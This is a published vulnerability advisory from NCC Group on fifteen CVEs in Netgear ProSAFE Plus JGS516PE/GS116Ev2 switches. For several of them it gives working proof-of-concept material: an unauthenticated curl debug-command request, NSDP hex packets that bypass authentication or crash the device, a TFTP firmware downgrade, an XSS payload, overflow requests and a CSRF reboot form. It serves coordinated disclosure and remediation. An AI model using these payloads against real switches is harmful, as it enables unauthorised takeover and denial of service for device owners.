Back
Manuel Gines
Hardware & Embedded Systems
Research
Technical advisories
Vulnerability

March 8, 2021

17 mins read

Technical Advisory – Multiple Vulnerabilities in Netgear ProSAFE Plus JGS516PE / GS116Ev2 Switches

Multiple vulnerabilities were found in Netgear ProSafe Plus JGS516PE switches that may pose a serious risk to their users. The most critical vulnerability could allow unauthenticated users to gain arbitrary code execution.

The following vulnerabilities were the most relevant identified during the internal research:

Netgear reported that most of the vulnerabilities affecting the NSDP protocol were known due to end-of-life years ago and it is still enabled for legacy reasons, for customers who preferred to use Prosafe Plus. Furthermore, we were informed that, due to hardware limitations, it is not possible to implement many of the standard encryption protocols, such as those needed to implement HTTPS.

Technical Advisories:

Unauthenticated Remote Code Execution (CVE-2020-26919)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: prior to 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-26919
Advisory URL: https://kb.netgear.com/000062334/Security-Advisory-for-Missing-Function-Level-Access-Control-on-JGS516PE-PSV-2020-0377
Severity: 9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

The switch internal management web application in firmware versions prior to 2.6.0.43 failed to correctly implement access controls in one of its endpoints, allowing unauthenticated attackers to bypass authentication and execute actions with administrator privileges.

Impact

Due to the ability of execute system commands through the "debug" web sections, a successful exploitation of this vulnerability can lead to remote code execution on the affected device.

Details

It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument.

The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.

curl -X POST --data-raw 'submitId=debug&debugCmd=sys+dump&submitEnd='
'http://<IP>/login.htm'

Recommendation

Update device firmware to version 2.6.0.43 or later.

NSDP Authentication Bypass (CVE-2020-35231)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35231
Severity: 8.8 (High) - AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

Netgear developed a network protocol to be a discovery method with the ability to manage the switch configuration. It is known as Netgear Switch Management Protocol (NSDP) and it is used by "Netgear Switch Discovery Tool" and "ProSafe Plus Configuration Utility" software. The implementantion of this protocol in the devices analised does not properly handle authentication packages and, under certain circunstances, can be abused to bypass authentication method.

Impact

A remote unauthenticated attacker can send specially crafted authentication packages to execute any management actions in the device, including wiping the configuration by executing a factory restoration.

Details

The NSDP authentication process involves two steps: asking for a random token (0x17 command) and using it to generate a password hash that will be used to send authenticated requests (0x1a command).

The problem comes when the authenticated request is sent while the first step is skipped. When no other random number has been requested from last reboot it seems to be storeing an empty value and the system will accept as valid an empty authentication hash.

The following commands were used to restore the device to factory defaults (0x400) without knowing the administration password:

001a00000400000101ffff0000

Note that although it is required that no random token has been generated previously, multiple ways have been found to force a device reboot, effectively restoring the conditions to perform the current attack.

Recommendation

Netgear response established that none of the issues related to NSDP protocol are going to be fixed due to protocol EOL, so it is recommended to leave disabled the remote management feature and stop using the Pro Safe Plus Configuration Utility to modify the switch configuration.

Unauthenticated Firmware Update Mechanism (CVE-2020-35220)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35220
Severity: 8.3 (High) - AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

Summary

A TFTP server with the ability to update firmware was found to be active by default, allowing external attackers to upload custom firmware files without requiring administrative credentials.

Impact

An external attacker could use this vulnerability to upload outdated versions of the firmware containing other vulnerabilities, upload invalid data to left the device bricked or even upload custom firmware files that may include malicious code, such as backdoors.

Details

The active TFTP server allows any external user to upload custom firmware files. As an example, it was possible to install a previous firmware version using this method:

$ atftp 192.168.0.239
tftp> put JGS516PE_GS116Ev2_V2.6.0.24.bin
Sent 407581 bytes in 19.7 seconds

Recommendation

Update device firmware to version 2.6.0.48 or later.

TFTP Ineffective Firmware Checks (CVE-2020-35232)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35232
Severity: 8.1 (High) - AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Summary

The firmware update mechanism does not properly implements internal checks such as firmware length or checksum validations, allowing attackers to craft firmware files with the ability to overwrite the entire memory with custom code.

Impact

An attacker could use this situation to upload a custom firmware that overflow the firmware partition and overwrite all the memory content, including default or user defined configurations.

Details

The following flaws were detected:

  • The file length is only validated using the corresponding firmware header, regardless of the real file length.
  • The uploaded file is being written directly into the image partition, overwriting the previous information before being validated.
  • The firmware max size allowed (0x17ff00) overflows the partition size (0xc0000)
  • The serial port error displayed in the serial port when the CRC value does not match was used to reverse the implementation.

Recommendation

Update device firmware to version 2.6.0.48 or later.

Unauthenticated Buffer Overflow (CVE-2020-35224)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35224
Severity: 8.1 (High) - AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Summary

The implementation of the authentication command in Netgear Switch Management Protocol (NSDP) could be abused by sending a long parameter that will force a system reboot.

Impact

A remote unauthenticated attacker could use this vulnerability to execute a denial of service (DoS) attack by forcing continuous device reboots .

Details

The authentication command (0x1a) could be abused by sending a value with more than 8 bytes, causing a system reboot.

The following authentication message illustrates the problem including a value with only two more bytes than expected:

001a000affffffffffffffffffffffff0000

Recommendation

Netgear response established that none of the issues related to NSDP protocol are going to be fixed due to protocol EOL, so it is recommended to leave disabled the remote management feature and stop using the Pro Safe Plus Configuration Utility to modify the switch configuration.

Insecure Password Hashing Mechanism (CVE-2020-35221)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35221
Severity: 7.5 (High) - AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

The hashing algorithm implemented for password authentication in NSDP was found to be insecure in many ways, allowing an attacker with access to a network capture to generate valid passwords or infer some parts of the original one.

Impact

Successful exploitation of this vulnerability will allow the external attacker to gain administrative access to the switch.

Details

The hashing algorithm used to send authenticated requests was affected by several weaknesses.

The first one is related to original password leakage. An attacker with access to network capture containing the random number (command 0x17) and password hash (command 0x1a) packets will be able to infere the following information:

  • The first character could be retrieved from the 7th byte if the password length is less than 19.
  • If the first character is known it is possible to know if second and third characters are the same.
  • The last character could be retrieved when the password length%3 is equal to 1 (1, 4, 7, 10, …)
  • It is possible to infer the password length in groups of 3 elements

The second issue is that the algorithm is vulnerable to collision attacks. As before, an attacker with access to a network capture will be able to generate multiple valid passwords that can be used in the same way than the original one in a short period of time.

Recommendation

Netgear response established that none of the issues related to NSDP protocol are going to be fixed due to protocol EOL, so it is recommended to leave disabled the remote management feature and stop using the Pro Safe Plus Configuration Utility to modify the switch configuration.

Authentication Token Reuse (CVE-2020-35229)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35229
Severity: 7.5 (High) - AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

The random number used to generate the password hash in the NSDP protocol was not invalidated on every use. An attacker with access to the network will be able to obtain a valid hash and perform any request using a single authenticated packet.

Impact

NSDP does not implement protocol encryption so any intruder with the ability to intercept valid communications between user and device would be able to obtain a valid authentication token that can be used to perform any administrative actions.

Details

The random token (0x17 command) was not invalidated on each command execution, so an attacker with access to the network traffic will be able to reuse the same authentication hash multiple times by skipping the random number generation step.

This implementation invalidates the authentication procedure security, leaving the password hash in the same situation as if it were a clear-text password or session token.

Recommendation

Netgear response established that none of the issues related to NSDP protocol are going to be fixed due to protocol EOL, so it is recommended to leave disabled the remote management feature and stop using the Pro Safe Plus Configuration Utility to modify the switch configuration.

Stored XSS in Language Settings (CVE-2020-35228)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35228
Severity: 7.2 (High) - AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

The switch management web application is not properly validating and encoding all of the configuration parameters, allowing attackers to inject malicious JavaScript code that will be executed on every rendered web page.

Impact

Due to the existance of CSRF issues, an external attacker could trick an administrator user to send malicious payloads to store JavaScript code with the ability to execute administrative requests or exfiltrate internal information.

Details

The selectLang parameter from multiLanguageCfg section was not properly validated and was found to be reflected in every web page of the control panel.

The following request could be used as a proof of concept:

POST /index.htm HTTP/1.1
Host: 192.168.0.239
User-Agent: (...snip...)
Accept: (...snip...)
Accept-Language: (...snip...)
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
Origin: http://192.168.0.239
Connection: close
Referer: http://192.168.0.239/index.htm?0
Cookie: (...snip...)
Upgrade-Insecure-Requests: 1

submitId=multiLanguageCfg&selectLang=aaaa';alert(1);//&multiLangFlag=0&RegisterStatus=0&registeredPopUp=0&changePwdPopUp=0&changePwd=0&confirmPwd=0&submitEnd=

Recommendation

Netgear reported that it has no plans to provide a fix for this vulnerability so access to web management application has to be restricted to known hosts and extreme caution must be exercised while using it due to the lack of protocol encryption. Users following secure deployment practices to deploy switches behind firewalls won’t expose directly to the internet, effectively reducing the attack vector.

Buffer Overflow in IP Source Params (CVE-2020-35227)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35227
Severity: 7.2 (High) - AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

The delete functionality from "access control" section in management web application was not properly validating the length of its input parameters. One of the input parameters in that request could be abused to trigger a buffer overflow vulnerability.

Impact

A successful attack will allows an attacker to perform the inverse action, adding custom IP addresses to the access control list. It could also be abused to cause a system reboot.

Details

The delete action from access control functionality required the checkedList parameter, that is intended to contain a list of hosts ids to be removed from the whitelist.

This parameter can be abused to perform the inverse action and add IPs as can be shown below:

POST /config/maintenance_ip_source.htm HTTP/1.1
Host: 192.168.0.239
User-Agent: (...snip...)
Accept: (...snip...)
Accept-Language: (...snip...)
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://192.168.0.239
Connection: close
Referer: http://192.168.0.239/config/maintenance_ip_source.htm
Cookie: (...snip...)
 submitId=ipSource&ipAddr=192.168.0.220&subnetmask=255.255.255.0&ipSrcAction=del&checkedList=-999999999999999999999990123456789abcdefghijkl&submitEnd=

Getting as a result the ip 97.98.99.100/101.102.103.104 being added to the access list.

Recommendation

Netgear reported that it has no plans to provide a fix for this vulnerability so access to web management application has to be restricted to known hosts and extreme caution must be exercised while using it due to the lack of protocol encryption. Users following secure deployment practices to deploy switches behind firewalls won’t expose directly to the internet, effectively reducing the attack vector.

Unauthenticated Write Access to DHCP Configuration (CVE-2020-35226)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35226
Severity: 7.1 (High) - AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

Summary

The DCHP configuration feature from NSDP protocol allows unauthenticated requests to retrieve the DHCP status but does not implement any access control for other input parameters. As a result the service could be configured remotely by unauthenticated users.

Impact

An attacker could force multiple DHCP requests or disable it, probably leading into a denial of service attack.

Details

The DHCP command (0x0b) can be queried with values from 0 to 3. The last value is used to know the DHCP status but it was also possible to send the other values to configure the DHCP settings by sending either 0 (disable) or 1 (enable) values.

The following command can be used to enable DHCP:

000b000101ffff0000

Recommendation

Netgear response established that none of the issues related to NSDP protocol are going to be fixed due to protocol EOL, so it is recommended to leave disabled the remote management feature and stop using the Pro Safe Plus Configuration Utility to modify the switch configuration.

Unauthenticated Access to Switch Configuration Parameters (CVE-2020-35222)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35222
Severity: 6.5 (Medium) - AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

The NSDP protocol implemented in this device does not require authentication to query for configuration parameters when the protocol is active. When it is disabled it can be used to retrieve basic information such as IP, name, location or firmware versions. When it is enabled an unauthenticated user could use it to retrieve a full copy of its internal configuration.

Impact

The disclosure of this kind of information may be used to gain a greater understanding of the underlying technologies involved and tailor further attacks to these specific products.

Details

The NSDP protocol can not be fully disabled from this device and still allow to retrieve some information, such as system name, location, firmware version or serial number.

When remote management is enabled, every configuration parameter can be retrieved by requesting the corresponding command, with the exception of the system password. These requests do not require any form of authentication.

[-] Product Name (1): JGS516PE
[-] Product Type (2): Smart Switch Without SNMP (0xb'0000')
[-] System Name (3): Test5
[-] MAC Address (4): 38:94:ed:d0:b9:4a
[-] Location (5): 
[-] IP Address (6): 192.168.0.239
[-] Network Mask (7): 255.255.255.0
[-] Gateway Address (8): 192.168.0.254
[-] DHCP Mode (11): Disabled (0xb'00')
[-] FW Image Number (12): 0xb'02'
[-] FW Version Image 1 (13): 2.6.0.43
[-] FW Version Image 2 (14): 2.6.0.48
[-] Active Image (15): Firmware 2 (0xb'02')
...
[-] Port Statistics (4096): Port: 9, Bytes recv.: 62495, Bytes sent: 271979, Packets: 597, Broadcast: 67, Multicast: 38, CRC errors: 0
...
[-] VLAN Type (8192): Disabled (0xb'00')
[-] VLAN Group Ports (9216): 2
[-] VLAN 802.1Q IDs (12288): Port: 1, VLAN_ID: 0
...
[-] QoS Type (13312): 802.1p Based (0xb'02')
[-] QoS Ports (14336): Port: 1, Priority: Normal Priority
...
[-] Broadcast Filtering Ports (22528): Port: 16, Rate: 512 Kb/sec
[-] Port Mirroring (23552): Dest. Port: 0, Status?: 0x00, Src. Ports: None
[-] Number of Ports (24576): 0xb'10'

Recommendation

Netgear response established that none of the issues related to NSDP protocol are going to be fixed due to protocol EOL, so it is recommended to leave disabled the remote management feature and stop using the Pro Safe Plus Configuration Utility to modify the switch configuration. Even with the service disabled there is some information that can be retrieved so, to effectively mitigate this situation, it is recommend filtering traffic on UDP ports 63321 to 63324.

TFTP Unexpected Behaviours (CVE-2020-35233)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35233
Severity: 6.5 (Medium) - AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

The switch operating system is not able to manage concurrent processes while performing any action with TFTP server, allowing to cause system reboots being another action executed while the system is being updated.

Impact

An attacker could make use of this vulnerability to force continuous device reboots that will leave the device unusable.

Details

The TFTP server and update process does not seem to be integrated with multitask operations. It was possible to cause system reboots just trying to load the web panel while a firmware update was in progress or even sending several TFTP requests at a time.

Recommendation

Update device firmware to version 2.6.0.48 or later and try to enable TFTP server only while performing a firmware update.

Multiple Integer Overflow Instances (CVE-2020-35230)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35230
Severity: 6.5 (Medium) - AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Summary

The web application did not correctly sanitize any of the integer parameters sent from the client. As a consequence, it was possible to trigger integer overflow vulnerabilities in almost every POST request involving this kind of parameters.

Impact

Successful exploitation of this issue will lead into system reboots and potentially may be exploited in certain circumstances to gain remote code execution.

Details

The following example illustrates the vulnerability by abusing the groupId parameter from Basic 802.1Q VLAN configuration to force a system reboot:

POST /config/portbased_basic.htm HTTP/1.1
Host: 192.168.0.239
User-Agent: (...snip...)
Accept: (...snip...)
Accept-Language: (...snip...)
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
Origin: http://192.168.0.239
Connection: close
Referer: http://192.168.0.239/config/portbased_basic.htm
Cookie: (...snip...)

submitId=vlanPbMemCfg&bPortBasedVLAN=Enable&changeType=0&groupId=-12345678901234567890123456789012345678901234567890123456789012&memBMap=-
 999999999&submitEnd=

Recommendation

Netgear reported that it has no plans to provide a fix for this vulnerability so access to web management application has to be restricted to known hosts and extreme caution must be exercised while using it due to the lack of protocol encryption. Users following secure deployment practices to deploy switches behind firewalls won’t expose directly to the internet, effectively reducing the attack vector.

Multiple Write Commands Buffer Overflow (CVE-2020-35225)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35225
Severity: 6.4 (Medium) - AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H

Summary

The implementation of write requests in NSDP protocol does not validate the input length in write command paramateres, generating a buffer overflow condition that can be used to execute denial of service attacks.

Impact

A remote attacker could use this vulnerability to force continuous system reboots or even gain full control of the device execution flow.

Details

Write commands involving string parameters, such as “System Name” (0x03) or “Location” (0x05), does not check input length, producing a device reboot if big parameters are sent.

The following request includes a system name modification command with a string of 0x1ff “A” characters that forces a device reboot:

001a0008XXXXXXXXXXXXXXXX000301ff(41x512)ffff0000

Recommendation

Netgear response established that none of the issues related to NSDP protocol are going to be fixed due to protocol EOL, so it is recommended to leave disabled the remote management feature and stop using the Pro Safe Plus Configuration Utility to modify the switch configuration.

Ineffective Cross Site Request Forgery Protections (CVE-2020-35223)

Vendor: Netgear Inc.
Vendor URL: https://www.netgear.com/
Versions affected: 2.6.0.43
Systems Affected: Netgear ProSAFE Plus JGS516PE / GS116Ev2
Author: Manuel Ginés Rodríguez - manuel.gines[at]nccgroup[dot]com
CVE Identifier: CVE-2020-35223
Severity: 6.3 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Summary

The management web application implements a random token named “secureRand“ to avoid CSRF attacks, but this security feature could be bypassed by removing that parameter from requests.

Impact

This could allow an attacker to manipulate a user into unwittingly performing administrative actions on behalf of the attacker.

Details

The web application implements a CSRF protection by including a random token (secureRand) in the source code of every web page generated.

It was found that POST requests does not require that parameter to be executed invalidating the CSRF prevention method.

As an example, the following HTTP snippet was created to perform a system reboot without requiring the CSRF token:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<IP>/config/maintenance_device_reboot.htm" method="POST">
<input type="hidden" name="submitId" value="sysReset" />
<input type="hidden" name="reboot" value="1" />
<input type="hidden" name="submitEnd" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Recommendation

Netgear reported that it has no plans to provide a fix for this vulnerability so access to web management application has to be restricted to known hosts and extreme caution must be exercised while using it due to the lack of protocol encryption. Users following secure deployment practices to deploy switches behind firewalls won’t expose directly to the internet, effectively reducing the attack vector.

Vendor Communication

  • 01 Sep 2020 – First contact with the vendor.
  • 05 Sep 2020 – Vulnerabilities details reported to Netgear.
  • 17 Sep 2020 – Netgear published a security advisory for the most critical issue.
  • 29 Oct 2020 – Call with Netgear team to discuss vulnerabilities, CVSS ratings and remediation plan.
  • 02 Dec 2020 – Netgear released the new firmware v2.6.0.48 including fixes for CVE-2020-35220, CVE-2020-35232, CVE-2020-35233 and other minor issues. NCC Group was informed that there are no future plans to fix the other issues.
  • 16 Dec 2021 – Start the process to coordinate the publication of this document.
  • 11 Jan 2021 – First draft shared with Netgear.
  • 27 Jan 2021 – Remediation actions were agreed. An initial paragraph reflecting Netgear's posture was also added.
  • 08 Mar 2021 – Technical Advisory published by NCC Group.

Vendor communication was really smooth. Netgear team were extremely collaborative in the vulnerability disclosure process, to the point of organizing several calls to present their roadmap and discuss future actions. I would like to thank Netgear Team for their efforts and support throughout the process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: March 8 2021
Written by: Manuel Ginés Rodríguez

Published by Manuel Gines

Here are some related articles you may find interesting

Public Report – Confidential Mode for Hyperdisk – DEK Protection Analysis

During the spring of 2024, Google engaged NCC Group to conduct a design review of Confidential Mode for Hyperdisk (CHD) architecture in order to analyze how the Data Encryption Key (DEK) that encrypts data-at-rest is protected. The project was 10 person days and the goal is to validate that the…

Public Reports

April 12, 2024

1 min read

Non-Deterministic Nature of Prompt Injection 

As we explained in a previous blogpost, exploiting a prompt injection attack is conceptually easy to understand: There are previous instructions in the prompt, and we include additional instructions within the user input, which is merged together with the legitimate instructions in a way that the underlying model cannot distinguish…

Machine Learning
Offensive Security & Artificial Intelligence

April 12, 2024

3 mins read

Technical Advisory – Ollama DNS Rebinding Attack (CVE-2024-28224)

Ollama is an open-source system for running and managing large language models (LLMs). NCC Group identified a DNS rebinding vulnerability in Ollama that permits attackers to access its API without authorization, and perform various malicious activities, such as exfiltrating sensitive file data from vulnerable systems.

Research
Technical advisories
Vulnerability

April 8, 2024

7 mins read

Previous post Next post

View articles by category

Most popular posts

Most recent posts

Call us before you need us.

Our experts will help you.

Get in touch